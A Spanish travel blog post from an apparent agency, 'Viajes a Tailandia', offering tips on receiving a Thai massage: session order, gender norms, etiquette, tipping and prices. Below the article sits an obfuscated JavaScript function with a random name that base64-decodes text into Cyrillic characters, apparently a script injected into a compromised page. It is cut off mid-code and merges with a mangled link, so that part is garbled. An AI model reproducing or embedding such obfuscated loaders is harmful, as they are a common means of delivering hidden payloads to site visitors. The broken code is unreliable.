Consejos para recibir un buen masaje tailandés

Desde Viajes a Tailandia te damos los mejores consejos para recibir un buen masaje tailandés. Un tratamiento que definitivamente no te puedes perder en tu travesía para sentirte mucho más relajado y tranquilo, ¡conoce más!

En Viajes a Tailandia conocemos la importancia de tomar una vacaciones para recargar energías del ajetreo diario, y definitivamente esto lo podrás lograr en la "Tierra de las Sonrisas". Una de las mejores formas de relajarte es consintiéndote, es por eso que hoy te damos algunos consejos para recibir un buen masaje tailandés. Sigue leyendo para descubrir qué puedes esperar, cuál es el protocolo y algunas sugerencias respecto a tu viaje, ¡realmente valdrá la pena!

¿En qué consiste el masaje tailandés?

Primero que nada, todo depende de lo que tú busques. Si tan solo necesitas un momento tranquilo para relajarte, te aseguramos que en cualquier lugar encontrarás a las personas indicadas para darte un buen masaje. Pero si eres un poco más exigente, los lugares donde hay menos personal te ofrecerán una mejor experiencia.

Para resumir el proceso: primero masajean tus piernas, luego tus brazos, luego te pedirán que te coloques boca abajo y trabajarán en tu espalda, de nuevo en las piernas, después estarás boca arriba otra vez para que puedan masajear tu cabeza, y luego estarás sentado para que puedan sonar tu espalda y estirar un poco tus articulaciones.

¿Cuál es el protocolo en un masaje tailandés?

En el Norte, las mujeres reciben masajes de otras mujeres exclusivamente, pero en Bangkok esto puede variar. De todas formas, siempre puedes hablar con el personal del sitio para explicar cómo te sentirías más cómoda. Por otra parte, los hombres siempre masajean a otros hombres, pero igualmente, si tienes un problema con esto, nunca estará mal decirlo. Aunque es bueno aclarar que realmente no hace mucha diferencia ya que en la mayoría de los casos ambos son igual de delicados y cuidadosos con cada parte de tu cuerpo.

Siéntete libre de decirle a tu masajista dónde te duele o cuáles son las áreas problemáticas, y nunca tengas miedo de decir si deseas que sean un poco más gentiles o, ¿por qué no? Un poco más fuertes, pero siempre de forma educada.

Las mujeres más pudorosas son quienes tienden a verse más reacias a la idea, sin embargo, no todo es tan incómodo como lo imaginas y te garantizamos que te sentirás como nueva al terminar. Si deseas llevar ropa interior, no hay ningún problema, lo más recomendable será utilizar un brassier deportivo que te permita sentirte cómoda y facilitar las cosas para quien te ofrece el masaje.

Como regla general de etiqueta, recuerda siempre dar propinas, sobre todo cuando has notado que el masaje fue realmente bueno.

Precios y locales para recibir un buen masaje tailandés

Te encontrarás con una inmensa variedad de precios, generalmente más altos en la capital que en localidades del norte como Chiang Mai. Por supuesto, si acudes a un spa de lujo, probablemente sea más costoso, aunque realmente podría no hacer mucha diferencia respecto a la experiencia en sitios más modestos.

Finalmente, recuerda detallar las características del lugar: ¿se ve mal?, ¿huele extraño?, entonces lo mejor es no obtener el servicio ahí y simplemente dar la vuelta. Nunca sabes qué podrías esperar de un sitio así, lo mejor es acudir a los locales recomendados para recibir un buen masaje tailandés.

¿Ya has vivido esta experiencia en Tailandia? Déjanos tus comentarios y si te gustó no dudes en compartir.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandia.com" class="external" rel="nofollow">Viajes a Tailandia

Deja tu comentario debajo